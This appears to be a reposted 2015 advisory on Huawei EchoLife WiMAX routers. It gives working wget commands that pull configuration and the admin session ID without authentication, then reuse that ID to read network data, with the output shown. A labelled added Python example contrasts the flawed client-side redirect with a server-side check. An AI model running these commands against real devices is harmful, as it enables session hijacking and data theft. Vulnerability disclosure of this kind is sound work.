Multiple vulnerabilities confirmed in Huawei WiMAX routers

2015-12-04T00:00:00
ID MYHACK58:62201569686
Type myhack58
Reporter Anonymous
Modified 2015-12-04T00:00:00

Description

Vulnerability overview

Huawei BM626e is a very rigorous WiMAX router/AP device, which may be used to provide Internet access over a WiMAX network. The following tests were performed on the latest version of the firmware (V100R001CIVC24B010).

Note: this firmware is also used in other WiMAX devices. Huawei has officially confirmed that the following devices are affected:

- EchoLife BM626e WiMAX CPE
- EchoLife BM626 WiMAX CPE
- EchoLife BM635 WiMAX CPE
- EchoLife BM632 WiMAX CPE
- EchoLife BM631a WiMAX CPE
- EchoLife BM632w WiMAX CPE
- EchoLife BM652 WiMAX CPE

These routers are still sold and used in some countries and regions. The products are known to be in use in at least the following:

- MTN CI (Côte d'Ivoire)
- Iran Cell (Iran)
- Irak Telecom (Iraq)
- Libyamax (Libya)
- Globe Telecom (Philippines)
- Zain Bahrain (Bahrain)
- FreshTel (Ukraine)

Details - unauthenticated disclosure of sensitive information

By default, the page http://192.168.1.1/check.html contains important information (WiMAX configuration, network configuration, WiFi and SIP configuration, etc.), and this information can be obtained easily without authentication. A JavaScript redirect (to /login.html) gets in the attacker's way, but the information can still be retrieved easily with wget:

    root@kali:~# wget http://192.168.1.1/check.html; less check.html

Details - admin session cookie hijacking

If an administrator is currently managing the device (or has used the device without disconnecting properly), an attacker located on the LAN (or on the WAN, if HTTP is open on the WAN interface) can steal the current session.

The administrator session ID ("SID") can be found on multiple pages without authentication:

- http://192.168.1.1/wimax/security.html
- http://192.168.1.1/static/deviceinfo.html
- ...

The security.html page contains a valid session ID and does not require authentication:

    sid="SID24188"

A "protection" written in JavaScript redirects the attacker to the login page. But this JavaScript contains the administrator session (sid="SIDXXXXX"), so the attacker can easily get the content with wget:

    root@kali:~# wget http://192.168.1.1/wimax/security.html ; less security.html
    root@kali:~# wget http://192.168.1.1/static/deviceinfo.html ; less deviceinfo.html

Please note: by accessing these pages, the attacker can disconnect the administrator from the admin panel.

Details - using the stolen admin session ID to obtain sensitive information and conduct CSRF attacks

Using the previously stolen SID, tasks that only the administrator is permitted to perform can be carried out without any credentials:

- Edit the WLAN configuration
- Edit the WAN configuration
- Edit the LAN configuration
- Open HTTP/HTTPS/TELNET/SSH on the LAN and WAN interfaces
- Change the DMZ configuration
- Edit port mapping
- Edit port triggering
- Edit the SIP configuration
- Upload a custom firmware
- ...

Access to personal information (network information):

    root@kali:~# wget -qO- 'http://192.168.1.1/static/rethdhcp.jsx?WWW_SID=SID24188&t=0'
    Saving to: `STDOUT'
    stats={};do{stats.dhcplist="44:8A:5B:AA:AA:AA,192.168.1.3,71:52:02@00:E0:4C:AA:AA:AA,192.168.1.2,71:52:02";
    stats.enrichment="
    eth0 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA
         UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
         RX packets:27 errors:0 dropped:0 overruns:0 frame:0
         TX packets:109 errors:0 dropped:0 overruns:0 carrier:0
         collisions:0 txqueuelen:1000
         RX bytes:2887 (2.8 KiB) TX bytes:46809 (45.7 KiB)
         Interrupt:9 Base address:0x4000
    eth1 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA
         UP BROADCAST PROMISC MULTICAST MTU:1500 Metric:
         RX packets:0 errors:0 dropped:0 overruns:0 frame:0
         TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
         collisions:0 txqueuelen:1000
         RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
         Interrupt:9 Base address:0x4000
    eth2 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA
         UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
         RX packets:2530 errors:0 dropped:0 overruns:0 frame:0
         TX packets:2619 errors:0 dropped:0 overruns:0 carrier:0
         collisions:0 txqueuelen:1000
         RX bytes:351557 (343.3 KiB) TX bytes:536669 (524.0 KiB)
         Interrupt:9 Base address:0x4000
    eth3 Link encap:Ethernet HWaddr 34:6B:D3:AA:AA:AA
         UP BROADCAST PROMISC MULTICAST MTU:1500 Metric:1
         RX packets:0 errors:0 dropped:0 overruns:0 frame:0
         TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
         collisions:0 txqueuelen:1000
         RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
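
The session-ID leak described under "admin session cookie hijacking" comes from making the access decision in browser JavaScript instead of on the server. The following added example (not code from the original advisory or from the Huawei firmware) contrasts that pattern with a server-side check and audits both the way a cookie-less client such as wget sees them; the handler names, the script body and the session table are constructed assumptions.

```python
import re

# Constructed stand-in for the device's session table (assumption, not firmware code).
ACTIVE_SESSIONS = {"SID24188"}
LOGIN = "/login.html"

def vulnerable_page(cookie_sid):
    """Pattern the advisory describes: the body is always sent, and the only
    'protection' is a script that a non-browser client never executes.
    cookie_sid is ignored on purpose: the server performs no check at all."""
    admin_sid = next(iter(ACTIVE_SESSIONS))
    body = ('<script>var sid="%s";'
            'if(document.cookie.indexOf(sid)<0)location.href="%s";</script>'
            '<h1>Security settings</h1>' % (admin_sid, LOGIN))
    return 200, {}, body

def hardened_page(cookie_sid):
    """Server-side check: without a valid session the client gets a real
    HTTP redirect and an empty body."""
    if cookie_sid not in ACTIVE_SESSIONS:
        return 302, {"Location": LOGIN}, ""
    # The session ID is never echoed into the page body.
    return 200, {}, "<h1>Security settings</h1>"

SID_RE = re.compile(r'sid\s*=\s*"(SID\d+)"')
JS_REDIRECT_RE = re.compile(r'location(?:\.href)?\s*=\s*"[^"]*login\.html')

def audit(handler):
    """Request a page with no cookie and report what an unauthenticated
    client receives. Returns a list of findings (empty means clean)."""
    status, _headers, body = handler(None)
    findings = []
    if status == 200 and JS_REDIRECT_RE.search(body):
        findings.append("client-side-only redirect")
    if SID_RE.search(body):
        findings.append("session ID in unauthenticated body")
    return findings

if __name__ == "__main__":
    for handler in (vulnerable_page, hardened_page):
        print(handler.__name__, audit(handler) or "no findings")
```

The same two regular-expression checks can be applied to saved responses from a device under test to confirm whether a firmware update moved the check to the server.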
